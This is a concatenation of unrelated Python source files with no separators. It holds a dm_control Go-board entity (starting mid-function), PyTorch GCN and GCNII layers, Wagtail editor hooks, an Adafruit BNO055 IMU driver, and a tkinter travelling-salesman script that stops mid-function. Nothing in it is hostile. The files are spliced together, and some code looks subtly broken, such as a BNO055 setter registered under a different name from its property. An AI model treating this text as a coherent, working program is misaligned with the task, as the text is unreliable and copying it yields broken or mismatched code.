                                   rgba=(0.2, 0.2, 0.2, 0.5))
        white_mat = root.asset.add('material', name='white',
                                   rgba=(0.8, 0.8, 0.8, 0.5))
    else:
        transparent_mat = root.asset.add('material', name='intersection',
                                         rgba=(0, 1, 0, 0.0))
    sensor_mat = root.asset.add('material', name='sensor', rgba=(0, 1, 0, 0.3))
    # Board texture loaded from the bundled PNG.
    contents = resources.GetResource(_TEXTURE_PATH)
    root.asset.add('texture', name='goboard', type='2d',
                   file=mjcf.Asset(contents, '.png'))
    board_mat = root.asset.add(
        'material', name='goboard', texture='goboard',
        texrepeat=[0.97, 0.97])
    root.default.geom.set_attributes(
        type='box', size=(square_halfwidth, square_halfwidth, height))
    root.default.site.set_attributes(
        type='box',
        size=(sensor_size * square_halfwidth,) * 2 + (0.5 * height,),
        material=sensor_mat, group=composer.SENSOR_SITES_GROUP)
    board_height = height
    if _SHOW_DEBUG_GRID:
        # Thinner board so the debug grid geoms remain visible above it.
        board_height = 0.5*height
    root.worldbody.add(
        'geom',
        pos=(0, 0+y_offset, height),
        type='box',
        size=(square_halfwidth * boardsize,) * 2 + (board_height,),
        name=name,
        material=board_mat)
    # Intersection centers, symmetric about the (y-offset) board center.
    xpos = (np.arange(columns) - 0.5*(columns - 1)) * 2 * square_halfwidth
    ypos = (np.arange(rows) - 0.5*(rows - 1)) * 2 * square_halfwidth + y_offset
    geoms = []
    touch_sensors = []
    for i in range(rows):
        for j in range(columns):
            name = '{}_{}'.format(i, j)
            if _SHOW_DEBUG_GRID:
                # NOTE(review): in debug mode this rebinding also supplies the
                # material later used for the pass geom (last loop value) --
                # confirm this is intentional.
                transparent_mat = black_mat if ((i % 2) == (j % 2)) else white_mat
            geoms.append(
                root.worldbody.add(
                    'geom',
                    pos=(xpos[j], ypos[i], height),
                    name=name,
                    material=transparent_mat))
            site = root.worldbody.add('site', pos=(xpos[j], ypos[i], 2*height),
                                      name=name)
            touch_sensors.append(root.sensor.add('touch', site=site, name=name))
    # Wide strip (twice the board width) used to register a "pass" move.
    pass_geom = root.worldbody.add(
        'geom',
        pos=(0, y_offset, 0.0),
        size=(square_halfwidth*boardsize*2,
              square_halfwidth*boardsize) + (0.5 * height,),
        name='pass',
        material=transparent_mat)
    site = root.worldbody.add('site', pos=(0, y_offset, 0.0),
                              size=(square_halfwidth*boardsize*2,
                                    square_halfwidth*boardsize) + (0.5 * height,),
                              name='pass')
    pass_sensor = root.sensor.add('touch', site=site, name='pass')
    return root, geoms, touch_sensors, pass_geom, pass_sensor
class CheckerBoard(composer.Entity):
    """An entity representing a checkerboard."""

    def __init__(self, *args, **kwargs):
        super(CheckerBoard, self).__init__(*args, **kwargs)
        # Snapshot of physics contacts taken at the start of each substep;
        # populated by before_substep().
        self._contact_from_before_substep = None

    def _build(self, rows=3, columns=3, square_halfwidth=0.05):
        """Builds a `CheckerBoard` entity.

        Args:
            rows: Integer, the number of rows.
            columns: Integer, the number of columns.
            square_halfwidth: Float, the halfwidth of the squares on the board.
        """
        root, geoms, touch_sensors = _make_checkerboard(
            rows=rows, columns=columns, square_halfwidth=square_halfwidth)
        self._mjcf_model = root
        # Reshape the row-major lists so squares are addressable as [row, col].
        self._geoms = np.array(geoms).reshape(rows, columns)
        self._touch_sensors = np.array(touch_sensors).reshape(rows, columns)

    @property
    def mjcf_model(self):
        """The MJCF model of this board."""
        return self._mjcf_model

    def before_substep(self, physics, random_state):
        del random_state  # Unused.
        # Cache a copy of the array of active contacts before each substep.
        self._contact_from_before_substep = [
            copy.copy(c) for c in physics.data.contact
        ]

    def validate_finger_touch(self, physics, row, col, hand):
        """Returns True iff one of `hand`'s finger geoms touched square (row, col)."""
        # Geom for the board square
        geom_id = physics.bind(self._geoms[row, col]).element_id
        # finger geoms
        finger_geoms_ids = set(physics.bind(hand.finger_geoms).element_id)
        contacts = self._contact_from_before_substep
        set1, set2 = set([geom_id]), finger_geoms_ids
        for contact in contacts:
            # A contact counts regardless of which side holds the finger geom.
            finger_tile_contact = ((contact.geom1 in set1 and
                                    contact.geom2 in set2) or
                                   (contact.geom1 in set2 and contact.geom2 in set1))
            if finger_tile_contact:
                return True
        return False

    def get_contact_pos(self, physics, row, col):
        """Returns the position of a contact on square (row, col).

        NOTE(review): returns False (not None) when no contact is found, so
        callers must test truthiness rather than compare against None.
        """
        geom_id = physics.bind(self._geoms[row, col]).element_id
        # Here we use the array of active contacts from the previous substep, rather
        # than the current values in `physics.data.contact`. This is because we use
        # touch sensors to detect when a square on the board is being pressed, and
        # the pressure readings are based on forces that were calculated at the end
        # of the previous substep. It's possible that `physics.data.contact` no
        # longer contains any active contacts involving the board geoms, even though
        # the touch sensors are telling us that one of the squares on the board is
        # being pressed.
        contacts = self._contact_from_before_substep
        relevant_contacts = [
            c for c in contacts if c.geom1 == geom_id or c.geom2 == geom_id
        ]
        if relevant_contacts:
            # If there are multiple contacts involving this square of the board, just
            # pick the first one.
            return relevant_contacts[0].pos.copy()
        else:
            print("Touch sensor at ({},{}) doesn't have any active contacts!".format(
                row, col))
            return False

    def get_contact_indices(self, physics):
        """Returns (row, col) of the most pressed square, or None if none pressed."""
        pressures = physics.bind(self._touch_sensors.ravel()).sensordata
        # If any of the touch sensors exceed the threshold, return the (row, col)
        # indices of the most strongly activated sensor.
        if np.any(pressures > _TOUCH_THRESHOLD):
            return np.unravel_index(np.argmax(pressures), self._touch_sensors.shape)
        else:
            return None

    def sample_pos_inside_touch_sensor(self, physics, random_state, row, col):
        """Samples a uniform position within the (row, col) sensor site."""
        bound_site = physics.bind(self._touch_sensors[row, col].site)
        # Jitter in the board plane only (z component zeroed).
        jitter = bound_site.size * np.array([1., 1., 0.])
        return bound_site.xpos + random_state.uniform(-jitter, jitter)
class GoBoard(CheckerBoard):
    """An entity representing a Goboard.

    Behaves like CheckerBoard, with an extra "pass" strip: a press there is
    reported as the sentinel indices (-1, -1).
    """

    def _build(self, boardsize=7, square_halfwidth=0.05):
        """Builds a `GoBoard` entity.

        Args:
            boardsize: Integer, the size of the board (boardsize x boardsize).
            square_halfwidth: Float, the halfwidth of the squares on the board.
        """
        if boardsize != 7:
            raise ValueError('Only boardsize of 7x7 is implemented at the moment')
        root, geoms, touch_sensors, pass_geom, pass_sensor = _make_goboard(
            boardsize=boardsize, square_halfwidth=square_halfwidth)
        self._mjcf_model = root
        self._geoms = np.array(geoms).reshape(boardsize, boardsize)
        self._touch_sensors = np.array(touch_sensors).reshape(boardsize, boardsize)
        self._pass_geom = pass_geom
        self._pass_sensor = pass_sensor

    def get_contact_indices(self, physics):
        """Returns (row, col) of the strongest press, (-1, -1) for pass, or None."""
        pressures = physics.bind(self._touch_sensors.ravel()).sensordata
        # Deal with pass first
        pass_pressure = physics.bind(self._pass_sensor).sensordata
        if pass_pressure > np.max(pressures) and pass_pressure > _TOUCH_THRESHOLD:
            return -1, -1
        # If any of the other touch sensors exceed the threshold, return the
        # (row, col) indices of the most strongly activated sensor.
        if np.any(pressures > _TOUCH_THRESHOLD):
            return np.unravel_index(np.argmax(pressures), self._touch_sensors.shape)
        else:
            return None

    def validate_finger_touch(self, physics, row, col, hand):
        """Like CheckerBoard's check, but (-1, -1) validates against the pass strip."""
        # Geom for the board square
        if row == -1 and col == -1:
            geom_id = physics.bind(self._pass_geom).element_id
        else:
            geom_id = physics.bind(self._geoms[row, col]).element_id
        # finger geoms
        finger_geoms_ids = set(physics.bind(hand.finger_geoms).element_id)
        contacts = self._contact_from_before_substep
        set1, set2 = set([geom_id]), finger_geoms_ids
        for contact in contacts:
            finger_tile_contact = ((contact.geom1 in set1 and
                                    contact.geom2 in set2) or
                                   (contact.geom1 in set2 and contact.geom2 in set1))
            if finger_tile_contact:
                return True
        return False

    def sample_pos_inside_touch_sensor(self, physics, random_state, row, col):
        """Samples near the center of the (row, col) sensor site.

        Tighter jitter (25% of the site size) than the CheckerBoard version,
        so sampled points stay close to the intersection.
        """
        bound_site = physics.bind(self._touch_sensors[row, col].site)
        jitter = bound_site.size * np.array([0.25, 0.25, 0.])
        return bound_site.xpos + random_state.uniform(-jitter, jitter)
import numpy as np
import scipy.sparse as sp
import math
import torch
import torch.nn as nn
import torch.nn.functional as F
from torch.nn.init import xavier_uniform_
# Run on GPU when available, otherwise fall back to CPU.
device = 'cuda' if torch.cuda.is_available() else 'cpu'
def normt_spm(mx, method='in'):
    """Normalize a scipy sparse adjacency matrix.

    Args:
        mx: scipy sparse matrix to normalize.
        method: 'in' for row (in-degree) normalization of the transpose,
            'sym' for symmetric D^-1/2 A D^-1/2 normalization.

    Returns:
        The normalized sparse matrix.

    Raises:
        ValueError: if `method` is neither 'in' nor 'sym'.
    """
    if method == 'in':
        mx = mx.transpose()
        rowsum = np.array(mx.sum(1))
        r_inv = np.power(rowsum, -1).flatten()
        # Zero-degree rows produce inf; treat them as isolated nodes.
        r_inv[np.isinf(r_inv)] = 0.
        r_mat_inv = sp.diags(r_inv)
        return r_mat_inv.dot(mx)

    if method == 'sym':
        rowsum = np.array(mx.sum(1))
        r_inv = np.power(rowsum, -0.5).flatten()
        r_inv[np.isinf(r_inv)] = 0.
        r_mat_inv = sp.diags(r_inv)
        return mx.dot(r_mat_inv).transpose().dot(r_mat_inv)

    # Previously an unknown method fell through and silently returned None;
    # fail loudly instead.
    raise ValueError("unknown normalization method: %r" % (method,))
def spm_to_tensor(sparse_mx):
    """Convert a scipy sparse matrix to a torch sparse COO float32 tensor."""
    sparse_mx = sparse_mx.tocoo().astype(np.float32)
    indices = torch.from_numpy(np.vstack(
        (sparse_mx.row, sparse_mx.col))).long()
    values = torch.from_numpy(sparse_mx.data)
    shape = torch.Size(sparse_mx.shape)
    # torch.sparse.FloatTensor is deprecated; torch.sparse_coo_tensor is the
    # supported constructor and produces an equivalent sparse tensor.
    return torch.sparse_coo_tensor(indices, values, shape)
class GraphConv(nn.Module):
    """One graph-convolution layer: adj @ (x W^T) + b, with optional
    input dropout and optional ReLU on the output."""

    def __init__(self, in_channels, out_channels, dropout=False, relu=True):
        super().__init__()
        self.dropout = nn.Dropout(p=0.5) if dropout else None
        self.layer = nn.Linear(in_channels, out_channels)
        self.relu = nn.ReLU() if relu else None

    def forward(self, inputs, adj):
        x = inputs if self.dropout is None else self.dropout(inputs)
        # Feature transform first, then neighborhood aggregation via adj.
        support = torch.mm(x, self.layer.weight.T)
        out = torch.mm(adj, support) + self.layer.bias
        return out if self.relu is None else self.relu(out)
class GCN(nn.Module):
    """Stack of GraphConv layers built from a spec string.

    `hidden_layers` is a comma-separated list of layer widths, e.g.
    "d2048,1024,d": a leading 'd' on a width enables dropout for that
    layer, and a trailing lone 'd' enables dropout before the output layer.
    """

    def __init__(self, adj, in_channels, out_channels, hidden_layers):
        super().__init__()
        # In-degree normalize the adjacency and keep it as a sparse tensor.
        adj = normt_spm(adj, method='in')
        adj = spm_to_tensor(adj)
        self.adj = adj.to(device)
        # Train and eval currently share the same adjacency.
        self.train_adj = self.adj

        hl = hidden_layers.split(',')
        if hl[-1] == 'd':
            # Trailing lone 'd': dropout before the final output layer.
            dropout_last = True
            hl = hl[:-1]
        else:
            dropout_last = False

        i = 0
        layers = []
        last_c = in_channels
        for c in hl:
            if c[0] == 'd':
                # 'd<width>' enables dropout for this hidden layer.
                dropout = True
                c = c[1:]
            else:
                dropout = False
            c = int(c)

            i += 1
            conv = GraphConv(last_c, c, dropout=dropout)
            self.add_module('conv{}'.format(i), conv)
            layers.append(conv)

            last_c = c

        # Final projection: no ReLU, so outputs can be signed embeddings.
        conv = GraphConv(last_c, out_channels, relu=False, dropout=dropout_last)
        self.add_module('conv-last', conv)
        layers.append(conv)
        self.layers = layers

    def forward(self, x):
        # train_adj and adj are identical today; the split exists in case a
        # different training-time adjacency is introduced later.
        if self.training:
            for conv in self.layers:
                x = conv(x, self.train_adj)
        else:
            for conv in self.layers:
                x = conv(x, self.adj)
        # L2-normalize the output embeddings.
        return F.normalize(x)
### GCNII
class GraphConvolution(nn.Module):
    """GCNII-style graph convolution with an initial-residual connection.

    Computes output = theta * (support @ W^T) + (1 - theta) * r, where
    `support` mixes the propagated features with the layer-0 features h0
    (concatenated instead when `variant` is True) and theta decays with
    layer depth.
    """

    def __init__(self, in_features, out_features, dropout=False, relu=True,
                 residual=False, variant=False):
        super(GraphConvolution, self).__init__()
        self.variant = variant
        # The variant concatenates [hi, h0], doubling the input width.
        if self.variant:
            self.in_features = 2 * in_features
        else:
            self.in_features = in_features
        if dropout:
            self.dropout = nn.Dropout(p=0.5)
        else:
            self.dropout = None
        if relu:
            self.relu = nn.ReLU()
        else:
            self.relu = None
        self.out_features = out_features
        self.residual = residual
        self.layer = nn.Linear(self.in_features, self.out_features, bias=False)

    def reset_parameters(self):
        """Re-initialize the weight uniformly in [-1/sqrt(out), 1/sqrt(out)].

        Bug fix: this previously referenced ``self.weight``, which does not
        exist (the weight lives on the nn.Linear submodule), so calling it
        raised AttributeError.
        """
        stdv = 1. / math.sqrt(self.out_features)
        self.layer.weight.data.uniform_(-stdv, stdv)

    def forward(self, input, adj, h0, lamda, alpha, l):
        """Apply the layer.

        Args:
            input: node features entering this layer.
            adj: normalized (sparse) adjacency matrix.
            h0: features from the initial embedding (initial residual).
            lamda: identity-mapping strength hyperparameter.
            alpha: initial-residual mixing coefficient.
            l: 1-based layer index; deeper layers get a smaller theta.
        """
        if self.dropout is not None:
            input = self.dropout(input)
        theta = math.log(lamda / l + 1)
        hi = torch.spmm(adj, input)
        if self.variant:
            support = torch.cat([hi, h0], 1)
            r = (1 - alpha) * hi + alpha * h0
        else:
            support = (1 - alpha) * hi + alpha * h0
            r = support
        mm_term = torch.mm(support, self.layer.weight.T)
        output = theta * mm_term + (1 - theta) * r
        if self.residual:
            output = output + input
        if self.relu is not None:
            output = self.relu(output)
        return output
class GCNII(nn.Module):
    """GCNII network: linear embedding -> stacked GraphConvolution layers
    (each with an initial-residual connection to the embedding) -> linear
    output projection."""

    def __init__(self, adj, in_channels, out_channels, hidden_dim,
                 hidden_layers, lamda, alpha, variant, dropout=True):
        super(GCNII, self).__init__()
        self.alpha = alpha
        self.lamda = lamda

        # In-degree normalize the adjacency and keep it sparse on the device.
        adj = normt_spm(adj, method='in')
        adj = spm_to_tensor(adj)
        self.adj = adj.to(device)

        self.fc_dim = nn.Linear(in_channels, hidden_dim)
        self.relu = nn.ReLU()
        self.dropout = nn.Dropout()
        layers = nn.ModuleList()
        for _ in range(hidden_layers):
            layers.append(GraphConvolution(hidden_dim, hidden_dim,
                                           variant=variant, dropout=dropout))
        self.layers = layers
        self.fc_out = nn.Linear(hidden_dim, out_channels)

    def forward(self, x):
        _layers = []
        # Initial embedding, kept as h0 for every layer's initial residual.
        layer_inner = self.relu(self.fc_dim(self.dropout(x)))
        _layers.append(layer_inner)
        for i, con in enumerate(self.layers):
            layer_inner = con(layer_inner, self.adj, _layers[0],
                              self.lamda, self.alpha, i + 1)
        layer_inner = self.fc_out(self.dropout(layer_inner))
        return layer_inner
from django.contrib.staticfiles.templatetags.staticfiles import static
from django.utils.html import format_html
from wagtail.core import hooks
@hooks.register('insert_editor_js')
def editor_js():
    """Hook: inject the admin-widget script into the Wagtail page editor."""
    script_url = static('wagtailrelated/js/admin_widget.js')
    return format_html(
        """
        <script src="{}"></script>
        """,
        script_url,
    )
@hooks.register('insert_editor_css')
def editor_css():
    """Hook: inject the admin-widget stylesheet into the Wagtail page editor."""
    stylesheet_url = static('wagtailrelated/css/admin_widget.css')
    return format_html(
        """
        <link rel="stylesheet" href="{}">
        """,
        stylesheet_url,
    )
# The MIT License (MIT)
#
# Copyright (c) 2017 <NAME> for Adafruit Industries.
#
# Permission is hereby granted, free of charge, to any person obtaining a copy
# of this software and associated documentation files (the "Software"), to deal
# in the Software without restriction, including without limitation the rights
# to use, copy, modify, merge, publish, distribute, sublicense, and/or sell
# copies of the Software, and to permit persons to whom the Software is
# furnished to do so, subject to the following conditions:
#
# The above copyright notice and this permission notice shall be included in
# all copies or substantial portions of the Software.
#
# THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR
# IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY,
# FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE
# AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER
# LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM,
# OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN
# THE SOFTWARE.
"""
``adafruit_bno055`` - Adafruit 9-DOF Absolute Orientation IMU Fusion Breakout - BNO055
=======================================================================================
This is a CircuitPython driver for the Bosch BNO055 nine degree of freedom
inertial measurement unit module with sensor fusion.
* Author(s): <NAME>
"""
import time
import os

# Default on-disk location for saved calibration data: alongside this module.
CAL_DATA_PATH = os.path.dirname(os.path.abspath(__file__))
CAL_DATA_NAME = "BNO055_CALIBRATION_DATA.txt"

from micropython import const
from adafruit_bus_device.i2c_device import I2CDevice
from adafruit_register.i2c_struct import Struct, UnaryStruct

__version__ = "0.0.0-auto.0"
__repo__ = "https://github.com/adafruit/Adafruit_CircuitPython_BNO055.git"

# Expected value of the chip-ID register.
_CHIP_ID = const(0xa0)

# Operation modes (see the mode property's table for what each enables).
CONFIG_MODE = const(0x00)
ACCONLY_MODE = const(0x01)
MAGONLY_MODE = const(0x02)
GYRONLY_MODE = const(0x03)
ACCMAG_MODE = const(0x04)
ACCGYRO_MODE = const(0x05)
MAGGYRO_MODE = const(0x06)
AMG_MODE = const(0x07)
IMUPLUS_MODE = const(0x08)
COMPASS_MODE = const(0x09)
M4G_MODE = const(0x0a)
NDOF_FMC_OFF_MODE = const(0x0b)
NDOF_MODE = const(0x0c)

# Power modes.
_POWER_NORMAL = const(0x00)
_POWER_LOW = const(0x01)
_POWER_SUSPEND = const(0x02)

# Register addresses.
_MODE_REGISTER = const(0x3d)
_PAGE_REGISTER = const(0x07)
_CALIBRATION_REGISTER = const(0x35)
_TRIGGER_REGISTER = const(0x3f)
_POWER_REGISTER = const(0x3e)
_ID_REGISTER = const(0x00)
class _ScaledReadOnlyStruct(Struct):  # pylint: disable=too-few-public-methods
    """Read-only register Struct whose raw values are multiplied by `scale`."""

    def __init__(self, register_address, struct_format, scale):
        super(_ScaledReadOnlyStruct, self).__init__(register_address,
                                                    struct_format)
        self.scale = scale

    def __get__(self, obj, objtype=None):
        raw = super(_ScaledReadOnlyStruct, self).__get__(obj, objtype)
        return tuple(v * self.scale for v in raw)

    def __set__(self, obj, value):
        raise NotImplementedError()
class _ReadOnlyUnaryStruct(UnaryStruct):  # pylint: disable=too-few-public-methods
    """UnaryStruct register descriptor that rejects writes."""
    def __set__(self, obj, value):
        raise NotImplementedError()
class BNO055:
    """
    Driver for the BNO055 9DOF IMU sensor.

    Communicates over I2C via an ``adafruit_bus_device`` ``I2CDevice``.
    """
    temperature = _ReadOnlyUnaryStruct(0x34, 'b')
    """Measures the temperature of the chip in degrees Celsius."""
    accelerometer = _ScaledReadOnlyStruct(0x08, '<hhh', 1/100)
    """Gives the raw accelerometer readings, in m/s.

    .. warning:: This is deprecated. Use ``acceleration`` instead. It'll work
       with other drivers too."""
    acceleration = _ScaledReadOnlyStruct(0x08, '<hhh', 1/100)
    """Gives the raw accelerometer readings, in m/s."""
    magnetometer = _ScaledReadOnlyStruct(0x0e, '<hhh', 1/16)
    """Gives the raw magnetometer readings in microteslas.

    .. warning:: This is deprecated. Use ``magnetic`` instead. It'll work with
       other drivers too."""
    magnetic = _ScaledReadOnlyStruct(0x0e, '<hhh', 1/16)
    """Gives the raw magnetometer readings in microteslas."""
    gyroscope = _ScaledReadOnlyStruct(0x14, '<hhh', 1/16)
    """Gives the raw gyroscope reading in degrees per second."""
    euler = _ScaledReadOnlyStruct(0x1a, '<hhh', 1/16)
    """Gives the calculated orientation angles, in degrees."""
    quaternion = _ScaledReadOnlyStruct(0x20, '<hhhh', 1/(1 << 14))
    """Gives the calculated orientation as a quaternion."""
    linear_acceleration = _ScaledReadOnlyStruct(0x28, '<hhh', 1/100)
    """Returns the linear acceleration, without gravity, in m/s."""
    gravity = _ScaledReadOnlyStruct(0x2e, '<hhh', 1/100)
    """Returns the gravity vector, without acceleration in m/s."""

    def __init__(self, i2c, address=0x28):
        """Initialize the sensor on bus `i2c` at `address`, verify the chip
        ID, reset, and switch to NDOF mode."""
        self.i2c_device = I2CDevice(i2c, address)
        self.buffer = bytearray(2)
        chip_id = self._read_register(_ID_REGISTER)
        if chip_id != _CHIP_ID:
            raise RuntimeError("bad chip id (%x != %x)" % (chip_id, _CHIP_ID))
        self._reset()
        self._write_register(_POWER_REGISTER, _POWER_NORMAL)
        self._write_register(_PAGE_REGISTER, 0x00)
        self._write_register(_TRIGGER_REGISTER, 0x00)
        time.sleep(0.01)
        self.mode = NDOF_MODE
        time.sleep(0.01)

    def _write_register(self, register, value):
        """Write a single byte `value` to `register`."""
        self.buffer[0] = register
        self.buffer[1] = value
        with self.i2c_device as i2c:
            i2c.write(self.buffer)

    def _write_bytes(self, address, data):
        """Write a sequence of bytes starting at register `address`.

        Bug fix: I2CDevice has no ``writeList`` method; send the register
        address followed by the payload in one write transaction instead.
        """
        with self.i2c_device as i2c:
            i2c.write(bytes([address]) + bytes(data))

    def _read_register(self, register):
        """Read and return a single byte from `register`."""
        self.buffer[0] = register
        with self.i2c_device as i2c:
            i2c.write_then_readinto(self.buffer, self.buffer,
                                    out_end=1, in_start=1)
        return self.buffer[1]

    def _read_bytes(self, address, length):
        """Read `length` bytes starting at register `address`.

        Bug fix: this used to reference ``self._i2c_device`` (the attribute
        is ``i2c_device``) and a non-existent ``readList`` method; use a
        combined write/read transaction like ``_read_register`` does.
        """
        result = bytearray(length)
        with self.i2c_device as i2c:
            i2c.write_then_readinto(bytes([address]), result)
        return result

    def _reset(self):
        """Resets the sensor to default settings."""
        self.mode = CONFIG_MODE
        try:
            self._write_register(_TRIGGER_REGISTER, 0x20)
        except OSError:  # error due to the chip resetting
            pass
        # wait for the chip to reset (650 ms typ.)
        time.sleep(0.7)

    @property
    def mode(self):
        """
        Switch the mode of operation and return the previous mode.

        Mode of operation defines which sensors are enabled and whether the
        measurements are absolute or relative:

        +------------------+-------+---------+------+----------+
        | Mode             | Accel | Compass | Gyro | Absolute |
        +==================+=======+=========+======+==========+
        | CONFIG_MODE      |   -   |   -     |  -   |     -    |
        +------------------+-------+---------+------+----------+
        | ACCONLY_MODE     |   X   |   -     |  -   |     -    |
        +------------------+-------+---------+------+----------+
        | MAGONLY_MODE     |   -   |   X     |  -   |     -    |
        +------------------+-------+---------+------+----------+
        | GYRONLY_MODE     |   -   |   -     |  X   |     -    |
        +------------------+-------+---------+------+----------+
        | ACCMAG_MODE      |   X   |   X     |  -   |     -    |
        +------------------+-------+---------+------+----------+
        | ACCGYRO_MODE     |   X   |   -     |  X   |     -    |
        +------------------+-------+---------+------+----------+
        | MAGGYRO_MODE     |   -   |   X     |  X   |     -    |
        +------------------+-------+---------+------+----------+
        | AMG_MODE         |   X   |   X     |  X   |     -    |
        +------------------+-------+---------+------+----------+
        | IMUPLUS_MODE     |   X   |   -     |  X   |     -    |
        +------------------+-------+---------+------+----------+
        | COMPASS_MODE     |   X   |   X     |  -   |     X    |
        +------------------+-------+---------+------+----------+
        | M4G_MODE         |   X   |   X     |  -   |     -    |
        +------------------+-------+---------+------+----------+
        | NDOF_FMC_OFF_MODE|   X   |   X     |  X   |     X    |
        +------------------+-------+---------+------+----------+
        | NDOF_MODE        |   X   |   X     |  X   |     X    |
        +------------------+-------+---------+------+----------+

        The default mode is ``NDOF_MODE``.
        """
        return self._read_register(_MODE_REGISTER)

    @mode.setter
    def mode(self, new_mode):
        self._write_register(_MODE_REGISTER, CONFIG_MODE)  # Empirically necessary
        time.sleep(0.02)  # Datasheet table 3.6
        if new_mode != CONFIG_MODE:
            self._write_register(_MODE_REGISTER, new_mode)
            time.sleep(0.01)  # Table 3.6

    @property
    def get_calibration(self):
        """Gets the BNO055's calibration data if it exists.

        Bug fix: ``mode`` is a property, not a callable; assign to it.
        """
        if not self.calibrated:
            raise ValueError('Device not yet calibrated!')
        self.mode = CONFIG_MODE
        data = list(self._read_bytes(0x55, 22))
        self.mode = NDOF_MODE
        return data

    def set_calibration(self, data):
        """Sets the BNO055's calibration data.

        Bug fix: this was decorated ``@property`` while also taking an
        argument, which made it impossible to call; it is a plain method now,
        and ``mode`` is assigned rather than called.
        """
        if data is None or len(data) != 22:
            raise ValueError('Expected a list of 22 bytes of calibration data!')
        self.mode = CONFIG_MODE
        self._write_bytes(0x55, data)
        self.mode = NDOF_MODE

    def load_calibration(self, fpath=None):
        """Loads calibration data from a file, returning 22 bytes.

        Bug fixes: was an argument-taking ``@property``; read the file twice
        (the second ``f.read()`` always returned ''); used the undefined
        names ``idx`` and ``byte``; and built the default path without a
        separator.
        """
        if fpath is None:
            fpath = os.path.join(CAL_DATA_PATH, CAL_DATA_NAME)
        data = bytearray(22)
        with open(fpath, 'r') as f:
            lines = [line for line in f.read().split('\n') if line]
        if len(lines) != 22:
            raise ValueError('Expected a list of 22 bytes of calibration data!')
        for idx, item in enumerate(lines):
            data[idx] = int(item)
        return data

    def save_calibration(self, fpath=None):
        """Saves the BNO055's calibration data to a file, one byte per line.

        Bug fixes: was an argument-taking ``@property``; opened the file in
        binary mode while writing str; default path lacked a separator.
        """
        if fpath is None:
            fpath = os.path.join(CAL_DATA_PATH, CAL_DATA_NAME)
        with open(fpath, 'w') as f:
            for item in self.get_calibration:
                f.write("%s\n" % item)

    @property
    def calibration_status(self):
        """Tuple containing sys, gyro, accel, and mag calibration data."""
        calibration_data = self._read_register(_CALIBRATION_REGISTER)
        # Two bits per subsystem, packed high-to-low: sys, gyro, accel, mag.
        sys = (calibration_data >> 6) & 0x03
        gyro = (calibration_data >> 4) & 0x03
        accel = (calibration_data >> 2) & 0x03
        mag = calibration_data & 0x03
        return sys, gyro, accel, mag

    @property
    def calibrated(self):
        """Boolean indicating calibration status (all subsystems at 3)."""
        sys, gyro, accel, mag = self.calibration_status
        return sys == gyro == accel == mag == 0x03

    @property
    def external_crystal(self):
        """Switches the use of external crystal on or off."""
        last_mode = self.mode
        self.mode = CONFIG_MODE
        self._write_register(_PAGE_REGISTER, 0x00)
        value = self._read_register(_TRIGGER_REGISTER)
        self.mode = last_mode
        return value == 0x80

    @external_crystal.setter
    def use_external_crystal(self, value):
        last_mode = self.mode
        self.mode = CONFIG_MODE
        self._write_register(_PAGE_REGISTER, 0x00)
        self._write_register(_TRIGGER_REGISTER, 0x80 if value else 0x00)
        self.mode = last_mode
        time.sleep(0.01)
import math
from tkinter import *
import random
from itertools import permutations
from scipy.spatial import distance
root = Tk()
root.title("Найду Вам оптимальный путь")
# Number of cities; the window is scaled to N*100 pixels square.
N = 9
root.geometry(str(N*100) + "x" + str(N*100))
my_canvas = Canvas(root, width=N*100, height=N*100, bg="black")
my_canvas.pack(pady=1)
# Best (shortest) tour length found by the brute-force search.
recordDistance = math.inf
# matrix = [[randrange(N * 100) for i in range(2)] for j in range(N)]
# Fixed city coordinates (x, y); the commented line above generated them.
matrix = [[658, 791], [258, 286], [31, 701], [883, 522], [142, 578], [585, 740], [741, 21], [279, 97], [196, 636]]
firstOrder = list(range(0, N))
# All index permutations to test, and the best one found so far.
perm = []
bestPerm = []
print(matrix)
def lexicographical_permutation(arr):
    """Append every permutation of `arr` to the global `perm`, ordered
    lexicographically by the string form of the elements."""
    global perm
    as_strings = [str(item) for item in arr]
    for ordering in sorted(list(p) for p in permutations(as_strings)):
        perm += [[int(token) for token in ordering]]
def find_optimal_path():
    """Brute force: measure every tour in `perm` and record the shortest in
    the globals `recordDistance` / `bestPerm`."""
    global recordDistance, bestPerm
    for candidate in perm:
        total = 0
        # The loop iterates the permutation's *values* as indices; since a
        # permutation contains every index exactly once, the complete tour
        # length is still accumulated (just in a scrambled order).
        for idx in candidate:
            if idx + 1 < len(matrix):
                total += distance.euclidean(
                    (matrix[candidate[idx]][0], matrix[candidate[idx]][1], 0),
                    (matrix[candidate[idx + 1]][0], matrix[candidate[idx + 1]][1], 0))
        if total < recordDistance:
            recordDistance = total
            bestPerm = candidate
def create_dot(x, y, idx, offset):
    """Draw one city as a small red dot labelled with its index; the dot is
    shifted by `offset` so overlaid paths remain distinguishable."""
    cx, cy = x - offset, y - offset
    my_canvas.create_oval(cx - 2, cy - 2, cx + 2, cy + 2, fill="red")
    my_canvas.create_text(x - 10, y + 10, anchor=W, font="Purisa",
                          text=idx, fill="yellow")
def draw_path(color, path, offset):
    """Render every city dot plus the tour `path` as connected line segments."""
    for i, coords in enumerate(matrix):
        create_dot(coords[0], coords[1], i, offset)
    for a, b in zip(path, path[1:]):
        my_canvas.create_line(matrix[a][0] - offset, matrix[a][1] - offset,
                              matrix[b][0] - offset, matrix[b][1] - offset,
                              fill=color)
# lexicographical_permutation(firstOrder)
# find_optimal_path()
# bestPerm = [0, 2, 3, 1, 4]
# recordDistance = 678.3042142670913
# Precomputed brute-force result for the fixed 9-city matrix above; the
# exhaustive search (commented out) is slow for N=9 (9! permutations).
bestPerm = [3, 0, 5, 8, 2, 4, 1, 7, 6]
recordDistance = 2157.9982622423195
print(bestPerm)
print(recordDistance)
draw_path('white', bestPerm, 0)

# --- Genetic-algorithm state ---
GenOrder = list(range(0, N))
popSize = 200
# variations of GenOrder are kept here
population = []
bestPopulation = []
recordGenDistance = math.inf
fitness = []
def generate_population():
    """Fill the global `population` with `popSize` random tours."""
    global population
    for _ in range(popSize):
        random.shuffle(GenOrder)
